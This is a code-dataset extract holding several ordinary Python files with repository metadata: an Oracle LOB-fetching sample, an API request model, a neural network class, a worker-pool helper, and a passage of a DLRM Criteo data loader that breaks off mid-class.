Dataset schema (32 columns):
hexsha: string (length 40) | size: int64 (2 to 1.02M) | ext: string (10 classes) | lang: string (1 class)
max_stars_repo_path: string (4 to 245) | max_stars_repo_name: string (6 to 130) | max_stars_repo_head_hexsha: string (40) | max_stars_repo_licenses: list (1 to 10) | max_stars_count: int64 (1 to 191k, nullable) | max_stars_repo_stars_event_min_datetime: string (24, nullable) | max_stars_repo_stars_event_max_datetime: string (24, nullable)
max_issues_repo_path: string (4 to 245) | max_issues_repo_name: string (6 to 130) | max_issues_repo_head_hexsha: string (40) | max_issues_repo_licenses: list (1 to 10) | max_issues_count: int64 (1 to 67k, nullable) | max_issues_repo_issues_event_min_datetime: string (24, nullable) | max_issues_repo_issues_event_max_datetime: string (24, nullable)
max_forks_repo_path: string (4 to 245) | max_forks_repo_name: string (6 to 130) | max_forks_repo_head_hexsha: string (40) | max_forks_repo_licenses: list (1 to 10) | max_forks_count: int64 (1 to 105k, nullable) | max_forks_repo_forks_event_min_datetime: string (24, nullable) | max_forks_repo_forks_event_max_datetime: string (24, nullable)
content: string (2 to 1.02M) | avg_line_length: float64 (1 to 417k) | max_line_length: int64 (1 to 987k) | alphanum_fraction: float64 (0 to 1) | content_no_comment: string (0 to 1.01M) | is_comment_constant_removed: bool (1 class) | is_sharp_comment_removed: bool (1 class)
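The records below follow this schema. As a quick orientation, here is a minimal, hedged sketch of filtering such rows with pandas; the file name corpus.parquet and the thresholds are illustrative assumptions, not part of the dataset.

# Minimal sketch (assumptions: the split is exported as corpus.parquet; thresholds are illustrative).
import pandas as pd

df = pd.read_parquet("corpus.parquet")  # columns as listed in the schema above

# Keep Python files that look hand-written rather than minified or generated.
clean = df[
    (df["ext"] == "py")
    & (df["max_line_length"] <= 120)
    & (df["alphanum_fraction"].between(0.3, 0.9))
]
print(len(clean), "of", len(df), "rows kept")
print(clean[["max_stars_repo_name", "max_stars_count", "size"]].head())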
hexsha: 1c4206925a8873719c846bb49eb9fa449ed6ad0b | size: 2,778 | ext: py | lang: Python
max_stars: python/return_lobs_as_strings.py @ granadomoreno/oracle-db-examples (head feac5d72f4a8534c9b3e848bdfc501c5b4c69268) | licenses ["Apache-2.0"] | count 1,071 | events 2017-04-06T16:59:55.000Z to 2022-03-25T21:10:58.000Z
max_issues: python/return_lobs_as_strings.py @ abhishektripathi27/oracle-db-examples (head 0812a65c7c974718ec5a04454b8a42f7c25bf2a8) | licenses ["Apache-2.0"] | count 71 | events 2017-04-12T14:55:52.000Z to 2022-02-22T17:08:18.000Z
max_forks: python/return_lobs_as_strings.py @ abhishektripathi27/oracle-db-examples (head 0812a65c7c974718ec5a04454b8a42f7c25bf2a8) | licenses ["Apache-2.0"] | count 749 | events 2017-04-09T06:48:58.000Z to 2022-03-23T00:28:26.000Z
content:
#------------------------------------------------------------------------------
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
#
# Portions Copyright 2007-2015, Anthony Tuininga. All rights reserved.
#
# Portions Copyright 2001-2007, Computronix (Canada) Ltd., Edmonton, Alberta,
# Canada. All rights reserved.
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# return_lobs_as_strings.py
# Returns all CLOB values as strings and BLOB values as bytes. The
# performance of this technique is significantly better than fetching the LOBs
# and then reading the contents of the LOBs as it avoids round-trips to the
# database. Be aware, however, that this method requires contiguous memory so
# is not usable for very large LOBs.
#
# This script requires cx_Oracle 5.0 and higher.
#------------------------------------------------------------------------------
import cx_Oracle as oracledb
import sample_env
def output_type_handler(cursor, name, default_type, size, precision, scale):
if default_type == oracledb.CLOB:
return cursor.var(oracledb.LONG_STRING, arraysize=cursor.arraysize)
if default_type == oracledb.BLOB:
return cursor.var(oracledb.LONG_BINARY, arraysize=cursor.arraysize)
connection = oracledb.connect(sample_env.get_main_connect_string())
connection.outputtypehandler = output_type_handler
cursor = connection.cursor()
# add some data to the tables
print("Populating tables with data...")
cursor.execute("truncate table TestClobs")
cursor.execute("truncate table TestBlobs")
long_string = ""
for i in range(10):
char = chr(ord('A') + i)
long_string += char * 25000
# uncomment the line below for cx_Oracle 5.3 and earlier
# cursor.setinputsizes(None, oracledb.LONG_STRING)
cursor.execute("insert into TestClobs values (:1, :2)",
(i + 1, "STRING " + long_string))
# uncomment the line below for cx_Oracle 5.3 and earlier
# cursor.setinputsizes(None, oracledb.LONG_BINARY)
cursor.execute("insert into TestBlobs values (:1, :2)",
(i + 1, long_string.encode("ascii")))
connection.commit()
# fetch the data and show the results
print("CLOBS returned as strings")
cursor.execute("""
select
IntCol,
ClobCol
from TestClobs
order by IntCol""")
for int_col, value in cursor:
print("Row:", int_col, "string of length", len(value))
print()
print("BLOBS returned as bytes")
cursor.execute("""
select
IntCol,
BlobCol
from TestBlobs
order by IntCol""")
for int_col, value in cursor:
print("Row:", int_col, "string of length", value and len(value) or 0)
avg_line_length: 38.583333 | max_line_length: 79 | alphanum_fraction: 0.62887
content_no_comment:
import cx_Oracle as oracledb
import sample_env
def output_type_handler(cursor, name, default_type, size, precision, scale):
if default_type == oracledb.CLOB:
return cursor.var(oracledb.LONG_STRING, arraysize=cursor.arraysize)
if default_type == oracledb.BLOB:
return cursor.var(oracledb.LONG_BINARY, arraysize=cursor.arraysize)
connection = oracledb.connect(sample_env.get_main_connect_string())
connection.outputtypehandler = output_type_handler
cursor = connection.cursor()
print("Populating tables with data...")
cursor.execute("truncate table TestClobs")
cursor.execute("truncate table TestBlobs")
long_string = ""
for i in range(10):
char = chr(ord('A') + i)
long_string += char * 25000
cursor.execute("insert into TestClobs values (:1, :2)",
(i + 1, "STRING " + long_string))
cursor.execute("insert into TestBlobs values (:1, :2)",
(i + 1, long_string.encode("ascii")))
connection.commit()
print("CLOBS returned as strings")
cursor.execute("""
select
IntCol,
ClobCol
from TestClobs
order by IntCol""")
for int_col, value in cursor:
print("Row:", int_col, "string of length", len(value))
print()
print("BLOBS returned as bytes")
cursor.execute("""
select
IntCol,
BlobCol
from TestBlobs
order by IntCol""")
for int_col, value in cursor:
print("Row:", int_col, "string of length", value and len(value) or 0)
is_comment_constant_removed: true | is_sharp_comment_removed: true
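A note on the record above: the output type handler it demonstrates can be reused outside the sample's sample_env helpers and test tables. The sketch below is a hedged, stand-alone variant; the connect string and the my_documents table are assumptions for illustration only.

# Stand-alone sketch of the same technique (hypothetical DSN and table).
import cx_Oracle as oracledb

def output_type_handler(cursor, name, default_type, size, precision, scale):
    # Return CLOB columns as str and BLOB columns as bytes instead of LOB locators.
    if default_type == oracledb.CLOB:
        return cursor.var(oracledb.LONG_STRING, arraysize=cursor.arraysize)
    if default_type == oracledb.BLOB:
        return cursor.var(oracledb.LONG_BINARY, arraysize=cursor.arraysize)

connection = oracledb.connect("user/password@localhost/orclpdb")  # assumed connect string
connection.outputtypehandler = output_type_handler
cursor = connection.cursor()
for doc_id, body in cursor.execute("select id, body from my_documents"):  # assumed table
    print(doc_id, type(body), len(body))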
hexsha: 1c4206db82fb99d15020a10c5521de38829b5ce7 | size: 8,324 | ext: py | lang: Python
max_stars: ytelapi/models/body.py @ Ytel-Inc/YtelAPI-Python (head 139dc02d93e74c78b6c3d91e3002ae98e2270223) | licenses ["MIT"] | count null | events null
max_issues: ytelapi/models/body.py @ Ytel-Inc/YtelAPI-Python (head 139dc02d93e74c78b6c3d91e3002ae98e2270223) | licenses ["MIT"] | count null | events null
max_forks: ytelapi/models/body.py @ Ytel-Inc/YtelAPI-Python (head 139dc02d93e74c78b6c3d91e3002ae98e2270223) | licenses ["MIT"] | count null | events null
content:
# -*- coding: utf-8 -*-
"""
ytelapi
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
"""
class Body(object):
"""Implementation of the 'body' model.
TODO: type model description here.
Attributes:
mfrom (string): A valid Ytel Voice enabled number (E.164 format) that
will be initiating the phone call.
to (string): To number
url (string): URL requested once the call connects
method (string): Specifies the HTTP method used to request the
required URL once call connects.
status_call_back_url (string): URL that can be requested to receive
notification when call has ended. A set of default parameters will
be sent here once the call is finished.
status_call_back_method (string): Specifies the HTTP method
used to request StatusCallbackUrl.
fall_back_url (string): URL requested if the initial Url parameter
fails or encounters an error
fall_back_method (string): Specifies the HTTP method used to request
the required FallbackUrl once call connects.
heart_beat_url (string): URL that can be requested every 60 seconds
during the call to notify of elapsed time.
heart_beat_method (string): Specifies the HTTP method used to request
HeartbeatUrl.
timeout (int): Time (in seconds) Ytel should wait while the call is
ringing before canceling the call
play_dtmf (string): DTMF Digits to play to the call once it connects.
0-9, #, or *
hide_caller_id (bool): Specifies if the caller id will be hidden
record (bool): Specifies if the call should be recorded
record_call_back_url (string): Recording parameters will be sent here
upon completion
record_call_back_method (string): Method used to request the
RecordCallback URL.
transcribe (bool): Specifies if the call recording should be
transcribed
transcribe_call_back_url (string): Transcription parameters will be
sent here upon completion
if_machine (IfMachineEnum): How Ytel should handle the receiving
numbers voicemail machine
if_machine_url (string): URL requested when IfMachine=continue
if_machine_method (string): Method used to request the IfMachineUrl.
feedback (bool): Specify if survey should be enable or not
survey_id (string): The unique identifier for the survey.
"""
# Create a mapping from Model property names to API property names
_names = {
"mfrom":'From',
"to":'To',
"url":'Url',
"method":'Method',
"status_call_back_url":'StatusCallBackUrl',
"status_call_back_method":'StatusCallBackMethod',
"fall_back_url":'FallBackUrl',
"fall_back_method":'FallBackMethod',
"heart_beat_url":'HeartBeatUrl',
"heart_beat_method":'HeartBeatMethod',
"timeout":'Timeout',
"play_dtmf":'PlayDtmf',
"hide_caller_id":'HideCallerId',
"record":'Record',
"record_call_back_url":'RecordCallBackUrl',
"record_call_back_method":'RecordCallBackMethod',
"transcribe":'Transcribe',
"transcribe_call_back_url":'TranscribeCallBackUrl',
"if_machine":'IfMachine',
"if_machine_url":'IfMachineUrl',
"if_machine_method":'IfMachineMethod',
"feedback":'Feedback',
"survey_id":'SurveyId'
}
def __init__(self,
mfrom=None,
to=None,
url=None,
method=None,
status_call_back_url=None,
status_call_back_method=None,
fall_back_url=None,
fall_back_method=None,
heart_beat_url=None,
heart_beat_method=None,
timeout=None,
play_dtmf=None,
hide_caller_id=None,
record=None,
record_call_back_url=None,
record_call_back_method=None,
transcribe=None,
transcribe_call_back_url=None,
if_machine=None,
if_machine_url=None,
if_machine_method=None,
feedback=None,
survey_id=None):
"""Constructor for the Body class"""
# Initialize members of the class
self.mfrom = mfrom
self.to = to
self.url = url
self.method = method
self.status_call_back_url = status_call_back_url
self.status_call_back_method = status_call_back_method
self.fall_back_url = fall_back_url
self.fall_back_method = fall_back_method
self.heart_beat_url = heart_beat_url
self.heart_beat_method = heart_beat_method
self.timeout = timeout
self.play_dtmf = play_dtmf
self.hide_caller_id = hide_caller_id
self.record = record
self.record_call_back_url = record_call_back_url
self.record_call_back_method = record_call_back_method
self.transcribe = transcribe
self.transcribe_call_back_url = transcribe_call_back_url
self.if_machine = if_machine
self.if_machine_url = if_machine_url
self.if_machine_method = if_machine_method
self.feedback = feedback
self.survey_id = survey_id
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
mfrom = dictionary.get('From')
to = dictionary.get('To')
url = dictionary.get('Url')
method = dictionary.get('Method')
status_call_back_url = dictionary.get('StatusCallBackUrl')
status_call_back_method = dictionary.get('StatusCallBackMethod')
fall_back_url = dictionary.get('FallBackUrl')
fall_back_method = dictionary.get('FallBackMethod')
heart_beat_url = dictionary.get('HeartBeatUrl')
heart_beat_method = dictionary.get('HeartBeatMethod')
timeout = dictionary.get('Timeout')
play_dtmf = dictionary.get('PlayDtmf')
hide_caller_id = dictionary.get('HideCallerId')
record = dictionary.get('Record')
record_call_back_url = dictionary.get('RecordCallBackUrl')
record_call_back_method = dictionary.get('RecordCallBackMethod')
transcribe = dictionary.get('Transcribe')
transcribe_call_back_url = dictionary.get('TranscribeCallBackUrl')
if_machine = dictionary.get('IfMachine')
if_machine_url = dictionary.get('IfMachineUrl')
if_machine_method = dictionary.get('IfMachineMethod')
feedback = dictionary.get('Feedback')
survey_id = dictionary.get('SurveyId')
# Return an object of this model
return cls(mfrom,
to,
url,
method,
status_call_back_url,
status_call_back_method,
fall_back_url,
fall_back_method,
heart_beat_url,
heart_beat_method,
timeout,
play_dtmf,
hide_caller_id,
record,
record_call_back_url,
record_call_back_method,
transcribe,
transcribe_call_back_url,
if_machine,
if_machine_url,
if_machine_method,
feedback,
survey_id)
avg_line_length: 40.407767 | max_line_length: 84 | alphanum_fraction: 0.59827
content_no_comment:
class Body(object):
_names = {
"mfrom":'From',
"to":'To',
"url":'Url',
"method":'Method',
"status_call_back_url":'StatusCallBackUrl',
"status_call_back_method":'StatusCallBackMethod',
"fall_back_url":'FallBackUrl',
"fall_back_method":'FallBackMethod',
"heart_beat_url":'HeartBeatUrl',
"heart_beat_method":'HeartBeatMethod',
"timeout":'Timeout',
"play_dtmf":'PlayDtmf',
"hide_caller_id":'HideCallerId',
"record":'Record',
"record_call_back_url":'RecordCallBackUrl',
"record_call_back_method":'RecordCallBackMethod',
"transcribe":'Transcribe',
"transcribe_call_back_url":'TranscribeCallBackUrl',
"if_machine":'IfMachine',
"if_machine_url":'IfMachineUrl',
"if_machine_method":'IfMachineMethod',
"feedback":'Feedback',
"survey_id":'SurveyId'
}
def __init__(self,
mfrom=None,
to=None,
url=None,
method=None,
status_call_back_url=None,
status_call_back_method=None,
fall_back_url=None,
fall_back_method=None,
heart_beat_url=None,
heart_beat_method=None,
timeout=None,
play_dtmf=None,
hide_caller_id=None,
record=None,
record_call_back_url=None,
record_call_back_method=None,
transcribe=None,
transcribe_call_back_url=None,
if_machine=None,
if_machine_url=None,
if_machine_method=None,
feedback=None,
survey_id=None):
self.mfrom = mfrom
self.to = to
self.url = url
self.method = method
self.status_call_back_url = status_call_back_url
self.status_call_back_method = status_call_back_method
self.fall_back_url = fall_back_url
self.fall_back_method = fall_back_method
self.heart_beat_url = heart_beat_url
self.heart_beat_method = heart_beat_method
self.timeout = timeout
self.play_dtmf = play_dtmf
self.hide_caller_id = hide_caller_id
self.record = record
self.record_call_back_url = record_call_back_url
self.record_call_back_method = record_call_back_method
self.transcribe = transcribe
self.transcribe_call_back_url = transcribe_call_back_url
self.if_machine = if_machine
self.if_machine_url = if_machine_url
self.if_machine_method = if_machine_method
self.feedback = feedback
self.survey_id = survey_id
@classmethod
def from_dictionary(cls,
dictionary):
if dictionary is None:
return None
mfrom = dictionary.get('From')
to = dictionary.get('To')
url = dictionary.get('Url')
method = dictionary.get('Method')
status_call_back_url = dictionary.get('StatusCallBackUrl')
status_call_back_method = dictionary.get('StatusCallBackMethod')
fall_back_url = dictionary.get('FallBackUrl')
fall_back_method = dictionary.get('FallBackMethod')
heart_beat_url = dictionary.get('HeartBeatUrl')
heart_beat_method = dictionary.get('HeartBeatMethod')
timeout = dictionary.get('Timeout')
play_dtmf = dictionary.get('PlayDtmf')
hide_caller_id = dictionary.get('HideCallerId')
record = dictionary.get('Record')
record_call_back_url = dictionary.get('RecordCallBackUrl')
record_call_back_method = dictionary.get('RecordCallBackMethod')
transcribe = dictionary.get('Transcribe')
transcribe_call_back_url = dictionary.get('TranscribeCallBackUrl')
if_machine = dictionary.get('IfMachine')
if_machine_url = dictionary.get('IfMachineUrl')
if_machine_method = dictionary.get('IfMachineMethod')
feedback = dictionary.get('Feedback')
survey_id = dictionary.get('SurveyId')
return cls(mfrom,
to,
url,
method,
status_call_back_url,
status_call_back_method,
fall_back_url,
fall_back_method,
heart_beat_url,
heart_beat_method,
timeout,
play_dtmf,
hide_caller_id,
record,
record_call_back_url,
record_call_back_method,
transcribe,
transcribe_call_back_url,
if_machine,
if_machine_url,
if_machine_method,
feedback,
survey_id)
is_comment_constant_removed: true | is_sharp_comment_removed: true
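The Body model above is round-trippable through its _names mapping; a short hedged usage sketch follows, with a made-up payload standing in for a real API response.

# Hedged usage sketch for the Body model above; payload values are illustrative.
payload = {
    "From": "+15551230000",
    "To": "+15551239999",
    "Url": "https://example.com/answer",
    "Method": "POST",
    "Timeout": 30,
}

body = Body.from_dictionary(payload)
print(body.mfrom, body.to, body.timeout)

# Map Python attribute names back to API keys, skipping unset fields.
api_dict = {api_key: getattr(body, attr)
            for attr, api_key in Body._names.items()
            if getattr(body, attr) is not None}
print(api_dict)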
hexsha: 1c4206f4baef4d3380d19223d4bb597733644ce4 | size: 1,491 | ext: py | lang: Python
max_stars: deepxde/maps/tensorflow/fnn.py @ fabyayu/deepxde (head 89880a4c61586512c87cabd1e7a3bdbaedf0feab) | licenses ["Apache-2.0"] | count null | events null
max_issues: deepxde/maps/tensorflow/fnn.py @ fabyayu/deepxde (head 89880a4c61586512c87cabd1e7a3bdbaedf0feab) | licenses ["Apache-2.0"] | count null | events null
max_forks: deepxde/maps/tensorflow/fnn.py @ fabyayu/deepxde (head 89880a4c61586512c87cabd1e7a3bdbaedf0feab) | licenses ["Apache-2.0"] | count null | events null
content:
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from .nn import NN
from .. import activations
from .. import initializers
from .. import regularizers
from ...backend import tf
class FNN(NN):
"""Fully-connected neural network."""
def __init__(
self, layer_sizes, activation, kernel_initializer, regularization=None
):
super(FNN, self).__init__()
self.regularizer = regularizers.get(regularization)
self.denses = []
activation = activations.get(activation)
initializer = initializers.get(kernel_initializer)
for units in layer_sizes[1:-1]:
self.denses.append(
tf.keras.layers.Dense(
units,
activation=activation,
kernel_initializer=initializer,
kernel_regularizer=self.regularizer,
)
)
self.denses.append(
tf.keras.layers.Dense(
layer_sizes[-1],
kernel_initializer=initializer,
kernel_regularizer=self.regularizer,
)
)
def call(self, inputs, training=False):
y = inputs
if self._input_transform is not None:
y = self._input_transform(y)
for f in self.denses:
y = f(y)
if self._output_transform is not None:
y = self._output_transform(inputs, y)
return y
avg_line_length: 29.82 | max_line_length: 78 | alphanum_fraction: 0.593561
content_no_comment:
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from .nn import NN
from .. import activations
from .. import initializers
from .. import regularizers
from ...backend import tf
class FNN(NN):
def __init__(
self, layer_sizes, activation, kernel_initializer, regularization=None
):
super(FNN, self).__init__()
self.regularizer = regularizers.get(regularization)
self.denses = []
activation = activations.get(activation)
initializer = initializers.get(kernel_initializer)
for units in layer_sizes[1:-1]:
self.denses.append(
tf.keras.layers.Dense(
units,
activation=activation,
kernel_initializer=initializer,
kernel_regularizer=self.regularizer,
)
)
self.denses.append(
tf.keras.layers.Dense(
layer_sizes[-1],
kernel_initializer=initializer,
kernel_regularizer=self.regularizer,
)
)
def call(self, inputs, training=False):
y = inputs
if self._input_transform is not None:
y = self._input_transform(y)
for f in self.denses:
y = f(y)
if self._output_transform is not None:
y = self._output_transform(inputs, y)
return y
is_comment_constant_removed: true | is_sharp_comment_removed: true
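A brief, hedged usage sketch for the FNN class above; the activation and initializer strings are assumptions about what deepxde's activations.get and initializers.get accept, and the input batch is synthetic.

# Hedged usage sketch; "tanh" and "Glorot uniform" are assumed to be accepted names.
import numpy as np

net = FNN(layer_sizes=[2, 32, 32, 1],
          activation="tanh",
          kernel_initializer="Glorot uniform")

x = np.random.rand(16, 2).astype("float32")  # batch of 16 two-dimensional inputs
y = net(x)                                   # forward pass through the dense stack
print(y.shape)                               # expected: (16, 1)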
hexsha: 1c4206f867f69dc25479bad4a9991f1cae1d265c | size: 3,608 | ext: py | lang: Python
max_stars: findatapy/util/swimpool.py @ mrderdelo/findatapy (head 5f619b372654a0246d6c12efedb286b237dba1a8) | licenses ["Apache-2.0"] | count null | events null
max_issues: findatapy/util/swimpool.py @ mrderdelo/findatapy (head 5f619b372654a0246d6c12efedb286b237dba1a8) | licenses ["Apache-2.0"] | count null | events null
max_forks: findatapy/util/swimpool.py @ mrderdelo/findatapy (head 5f619b372654a0246d6c12efedb286b237dba1a8) | licenses ["Apache-2.0"] | count null | events null
content:
__author__ = "saeedamen" # Saeed Amen
#
# Copyright 2016 Cuemacro
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on a "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
from findatapy.util import DataConstants
class SwimPool(object):
"""Creating thread and process pools in a generic way. Allows users to
specify the underlying thread or multiprocess library
they wish to use. Note you can share Pool objects between processes.
"""
def __init__(self, multiprocessing_library=None):
self._pool = None
if multiprocessing_library is None:
multiprocessing_library = DataConstants().multiprocessing_library
self._multiprocessing_library = multiprocessing_library
self._thread_technique = 'na'
if multiprocessing_library == 'multiprocess':
try:
import multiprocess;
multiprocess.freeze_support()
except:
pass
elif multiprocessing_library == 'multiprocessing_on_dill':
try:
import multiprocessing_on_dill;
multiprocessing_on_dill.freeze_support()
except:
pass
elif multiprocessing_library == 'multiprocessing':
try:
import multiprocessing;
multiprocessing.freeze_support()
except:
pass
def create_pool(self, thread_technique, thread_no, force_new=True,
run_in_parallel=True):
self._thread_technique = thread_technique
if not (force_new) and self._pool is not None:
return self._pool
if thread_technique == "thread" or run_in_parallel == False:
from multiprocessing.dummy import Pool
elif thread_technique == "multiprocessing":
# most of the time is spent waiting for Bloomberg to return, so we can use threads rather than multiprocessing
# must use the multiprocessing_on_dill library otherwise can't pickle objects correctly
# note: currently not very stable
if self._multiprocessing_library == 'multiprocessing_on_dill':
from multiprocessing_on_dill import Pool
elif self._multiprocessing_library == 'multiprocess':
from multiprocess import Pool
elif self._multiprocessing_library == 'multiprocessing':
from multiprocessing import Pool
elif self._multiprocessing_library == 'pathos':
from pathos.multiprocessing import Pool
# from pathos.pools import ProcessPool as Pool
elif self._multiprocessing_library == 'billiard':
from billiard.pool import Pool
if run_in_parallel == False: thread_no = 1
self._pool = Pool(thread_no)
return self._pool
def close_pool(self, pool, force_process_respawn=False):
if pool is not None:
if (self._thread_technique != 'multiprocessing' and
self._multiprocessing_library != 'pathos') \
or force_process_respawn:
pool.close()
pool.join()
avg_line_length: 37.978947 | max_line_length: 119 | alphanum_fraction: 0.650499
content_no_comment:
__author__ = "saeedamen"
from findatapy.util import DataConstants
class SwimPool(object):
def __init__(self, multiprocessing_library=None):
self._pool = None
if multiprocessing_library is None:
multiprocessing_library = DataConstants().multiprocessing_library
self._multiprocessing_library = multiprocessing_library
self._thread_technique = 'na'
if multiprocessing_library == 'multiprocess':
try:
import multiprocess;
multiprocess.freeze_support()
except:
pass
elif multiprocessing_library == 'multiprocessing_on_dill':
try:
import multiprocessing_on_dill;
multiprocessing_on_dill.freeze_support()
except:
pass
elif multiprocessing_library == 'multiprocessing':
try:
import multiprocessing;
multiprocessing.freeze_support()
except:
pass
def create_pool(self, thread_technique, thread_no, force_new=True,
run_in_parallel=True):
self._thread_technique = thread_technique
if not (force_new) and self._pool is not None:
return self._pool
if thread_technique == "thread" or run_in_parallel == False:
from multiprocessing.dummy import Pool
elif thread_technique == "multiprocessing":
# note: currently not very stable
if self._multiprocessing_library == 'multiprocessing_on_dill':
from multiprocessing_on_dill import Pool
elif self._multiprocessing_library == 'multiprocess':
from multiprocess import Pool
elif self._multiprocessing_library == 'multiprocessing':
from multiprocessing import Pool
elif self._multiprocessing_library == 'pathos':
from pathos.multiprocessing import Pool
# from pathos.pools import ProcessPool as Pool
elif self._multiprocessing_library == 'billiard':
from billiard.pool import Pool
if run_in_parallel == False: thread_no = 1
self._pool = Pool(thread_no)
return self._pool
def close_pool(self, pool, force_process_respawn=False):
if pool is not None:
if (self._thread_technique != 'multiprocessing' and
self._multiprocessing_library != 'pathos') \
or force_process_respawn:
pool.close()
pool.join()
is_comment_constant_removed: true | is_sharp_comment_removed: true
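To make the SwimPool record above concrete, here is a hedged usage sketch; the worker function is illustrative and the default multiprocessing library falls back to whatever DataConstants configures.

# Hedged usage sketch for SwimPool above; square() is an illustrative worker.
def square(x):
    return x * x

swim_pool = SwimPool()                                   # library choice comes from DataConstants
pool = swim_pool.create_pool(thread_technique="thread",  # multiprocessing.dummy.Pool underneath
                             thread_no=4)
results = pool.map(square, range(10))                    # standard Pool.map
swim_pool.close_pool(pool)
print(results)                                           # [0, 1, 4, 9, ...]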
hexsha: 1c420711beff9837696decc0b73a04ed0db8b294 | size: 14,316 | ext: py | lang: Python
max_stars: NVIDIA/benchmarks/dlrm/implementations/pytorch/dlrm/data/dataset.py @ goswamig/training_results_v0.7 (head 4278ce8a0f3d4db6b5e6054277724ca36278d7a3) | licenses ["Apache-2.0"] | count 48 | events 2020-07-29T18:09:23.000Z to 2021-10-09T01:53:33.000Z
max_issues: NVIDIA/benchmarks/dlrm/implementations/pytorch/dlrm/data/dataset.py @ goswamig/training_results_v0.7 (head 4278ce8a0f3d4db6b5e6054277724ca36278d7a3) | licenses ["Apache-2.0"] | count 9 | events 2021-04-02T02:28:07.000Z to 2022-03-26T18:23:59.000Z
max_forks: NVIDIA/benchmarks/dlrm/implementations/pytorch/dlrm/data/dataset.py @ lablup/training_results_v0.7 (head f5bb59aa0f8b18b602763abe47d1d24d0d54b197) | licenses ["Apache-2.0"] | count 42 | events 2020-08-01T06:41:24.000Z to 2022-01-20T10:33:08.000Z
content:
import concurrent
import functools
import math
import os
import queue
import numpy as np
from dlrm import mlperf_logger
import torch
from torch.utils.data import Dataset
from dlrm.utils import distributed as dist
def get_data_loader(dataset_path,
batch_size,
test_batch_size,
return_device="cuda",
dataset_type="bin",
num_workers=0,
shuffle=False,
**kwargs):
"""Create data loaders
Args:
dataset_path (str): Path to dataset, train_data.bin and test_data.bin must exist under dataset_path.
batch_size (int): Training batch size
test_batch_size (int): Test batch size
return_device (str): Where to put the returned data. Default 'cuda'
dataset_type (str): One of ["bin", "memmap", "dist"] indicates which dataset to use. Default "bin".
num_workers (int): Default 0
shuffle (bool): If True, shuffle batch order. Default False.
Keyword Arguments:
numerical_features(boolean): If True, load numerical features for bottom_mlp. Default False
categorical_features (list or None): categorical features used by the rank
Returns:
data_loader_train (DataLoader):
data_loader_test (DataLoader):
"""
train_dataset_bin = os.path.join(dataset_path, "train_data.bin")
test_dataset_bin = os.path.join(dataset_path, "test_data.bin")
if dataset_type == 'bin':
dataset_train = CriteoBinDataset(train_dataset_bin, batch_size=batch_size, shuffle=shuffle)
dataset_test = CriteoBinDataset(test_dataset_bin, batch_size=test_batch_size)
elif dataset_type == 'memmap':
dataset_train = CriteoMemmapDataset(train_dataset_bin, batch_size=batch_size, shuffle=shuffle)
dataset_test = CriteoMemmapDataset(test_dataset_bin, batch_size=test_batch_size)
elif dataset_type == 'dist':
dataset_train = DistCriteoDataset(
os.path.join(dataset_path, "train"), batch_size=batch_size, shuffle=shuffle, **kwargs)
if hasattr(dataset_train, 'num_samples'):
mlperf_logger.log_event(key=mlperf_logger.constants.TRAIN_SAMPLES,
value=dataset_train.num_samples)
dataset_test = DistCriteoDataset(
os.path.join(dataset_path, "test"), batch_size=test_batch_size, **kwargs)
if hasattr(dataset_test, 'num_samples'):
mlperf_logger.log_event(key=mlperf_logger.constants.EVAL_SAMPLES,
value=dataset_test.num_samples)
data_loader_args = dict(
batch_size=None,
num_workers=num_workers,
pin_memory=False,
collate_fn=functools.partial(data_collate_fn, device=return_device, orig_stream=torch.cuda.current_stream()))
data_loader_train = torch.utils.data.DataLoader(dataset_train, **data_loader_args)
data_loader_test = torch.utils.data.DataLoader(dataset_test, **data_loader_args)
return data_loader_train, data_loader_test
def _dist_permutation(size):
"""Generate permutation for dataset shuffle
Args:
size (int): Size and high value of permutation
Returns:
permutation (ndarray):
"""
if dist.get_world_size() > 1:
# To guarantee all ranks have the same permutation, generate it on rank 0 and sync
# it to the other ranks by writing it to disk
permutation_file = "/tmp/permutation.npy"
if dist.get_local_rank() == 0:
np.save(permutation_file, np.random.permutation(size))
torch.distributed.barrier()
permutation = np.load(permutation_file)
else:
permutation = np.random.permutation(size)
return permutation
class CriteoBinDataset(Dataset):
"""Binary version of criteo dataset.
Main structure is copied from the reference, with the following changes:
- Removed unnecessary things, like counts_file which is not really used in training.
- _transform_features is removed, doing it on GPU is much faster.
"""
def __init__(self, data_file, batch_size=1, bytes_per_feature=4, shuffle=False):
# dataset. single target, 13 dense features, 26 sparse features
self.tad_fea = 1 + 13
self.tot_fea = 1 + 13 + 26
self.batch_size = batch_size
self.bytes_per_batch = (bytes_per_feature * self.tot_fea * batch_size)
self.num_batches = math.ceil(os.path.getsize(data_file) / self.bytes_per_batch)
print('data file:', data_file, 'number of batches:', self.num_batches)
self.file = open(data_file, 'rb', buffering=0)
if shuffle:
self.permutation = _dist_permutation(self.num_batches - 1)
else:
self.permutation = None
def __len__(self):
return self.num_batches
def __getitem__(self, idx):
if self.permutation is not None and idx != self.num_batches - 1:
idx = self.permutation[idx]
self.file.seek(idx * self.bytes_per_batch, 0)
raw_data = self.file.read(self.bytes_per_batch)
array = np.frombuffer(raw_data, dtype=np.int32)
tensor = torch.from_numpy(array).view((-1, self.tot_fea))
return tensor
def __del__(self):
self.file.close()
class CriteoMemmapDataset(Dataset):
"""Memmap version of criteo dataset
Accessing sequentially is a lot faster on memmap
Args:
data_file (str): Full path to binary file of dataset
batch_size (int):
bytes_per_feature (int): Default 4
shuffle (bool): If True, shuffle batch order by creating a permutation. Default False
"""
def __init__(self, data_file, batch_size, bytes_per_feature=4, shuffle=False):
self.record_width = 40 # 13 numerical, 26 categorical, 1 label
self.batch_size = batch_size
bytes_per_batch = (bytes_per_feature * self.record_width * batch_size)
